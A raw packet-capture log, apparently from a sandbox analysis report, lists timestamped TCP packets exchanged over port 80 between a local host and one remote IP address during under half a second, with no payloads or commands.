Dec 10, 2024 00:42:36.835942030 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.835994959 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.836061954 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.836107969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.839345932 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.839396000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.839456081 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.839504004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.842607975 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.842657089 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.842711926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.842756033 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.845787048 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.845839024 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.845909119 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.845953941 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.848973036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.849023104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.849092007 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.849137068 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.852178097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.852229118 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.852293968 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.852339983 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.855338097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.855386972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.855453014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.855496883 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.858561993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.858623028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.858680010 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.858722925 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.861783028 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.861839056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.861862898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.861901999 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.864929914 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.864993095 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.864993095 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.865029097 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.868103027 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.868154049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.868235111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.868279934 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.871346951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.871395111 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.871463060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.871510029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.874491930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.874541044 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.874620914 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.874670982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.877687931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.877739906 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.877794981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.877840042 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.880908012 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.880958080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.881011009 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.881055117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.884051085 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.884100914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.884179115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.884223938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.887257099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.887305975 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.887351036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.887396097 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.890445948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.890492916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.890563011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.890609026 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.893599033 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.893659115 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.893721104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.893764973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.896795988 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.896857023 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.896898985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.896939993 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.900029898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.900171041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.900228977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.903194904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.903250933 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.903359890 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.903399944 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.906400919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.906478882 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.906505108 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.906544924 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.909574032 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.909619093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.909657001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.909698963 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.912769079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.912827015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.912889004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.912930965 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.915967941 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.916030884 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.916074991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.916116953 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.919130087 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.919186115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.919187069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.919224977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.922327995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.922379971 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.922415972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.922451973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.925508976 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.925564051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.925606966 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.925647974 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.928674936 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.928833008 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.993582964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.993637085 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.993671894 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.993714094 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.994957924 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.995002031 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.995079994 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.995120049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.997797012 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.997848034 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.997929096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.997970104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.000616074 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.000658035 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.000844002 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.000885963 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.003493071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.003505945 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.003551960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.003568888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.023243904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.023269892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.023293018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.023323059 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.023880005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.023924112 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.023930073 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.023960114 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.026145935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.026199102 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.026232958 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.026273966 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.027889013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.027940989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.028031111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.028073072 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.030183077 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.030225992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.030267000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.030306101 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.032444000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.032510042 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.032546997 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.032594919 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.034626961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.034688950 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.034749985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.034789085 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.036940098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.036988974 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.037024975 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.037126064 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.039052963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.039119005 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.039251089 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.039293051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.041115999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.041188002 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.041253090 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.041292906 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.043298960 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.043343067 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.043524027 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.043576956 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.045317888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.045396090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.045456886 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.045501947 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.047408104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.047460079 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.047597885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.047646046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.049438953 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.049503088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.049544096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.049596071 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.051495075 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.051544905 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.051599026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.051636934 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.053489923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.053570032 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.053607941 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.053647041 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.055505991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.055587053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.055610895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.055645943 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.056750059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.056797028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.056950092 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.056998014 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.058031082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.058125973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.058144093 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.058180094 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.059324026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.059365034 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.059441090 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.059556961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.060581923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.060630083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.060667992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.060712099 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.062011957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.062021971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.062061071 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.063102961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.063160896 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.063196898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.063242912 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.064393997 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.064444065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.064477921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.064518929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.065663099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.065716982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.065774918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.065821886 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.066971064 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.067019939 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.067079067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.067121983 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.068227053 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.068274021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.068306923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.068355083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.069487095 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.069535971 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.069833040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.069875002 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.070766926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.070813894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.070899963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.070961952 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.072026968 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.072068930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.072076082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.072104931 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.073278904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.073324919 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.073393106 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.073440075 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.074731112 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.074743032 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.074778080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.074790955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.075861931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.075916052 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.075934887 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.075980902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.077101946 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.077151060 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.077189922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.077234983 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.078413963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.078459024 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.078490973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.078538895 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.079638004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.079679012 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.079755068 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.079797983 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.081005096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.081018925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.081052065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.081063032 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.082184076 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.082232952 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.082303047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.082345963 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.083462954 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.083509922 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.083563089 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.083607912 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.084722042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.084768057 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.084851980 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.084897995 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.086009026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.086055994 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.086112976 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.086158991 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.087266922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.087318897 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.087373018 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.087419987 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.088555098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.088602066 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.088638067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.088681936 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.090028048 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.090060949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.090079069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.090102911 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.091093063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.091140985 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.091197014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.091243029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.092386961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.092433929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.092504025 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.092554092 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.093627930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.093676090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.093929052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.093971968 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.094891071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.094940901 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.095088005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.095135927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.096141100 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.096179962 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.189187050 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.189286947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.189362049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.189362049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.189830065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.189872026 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.189893007 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.189934969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.191041946 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.191095114 CET	49759	80	192.168.2.4	185.215.113.16
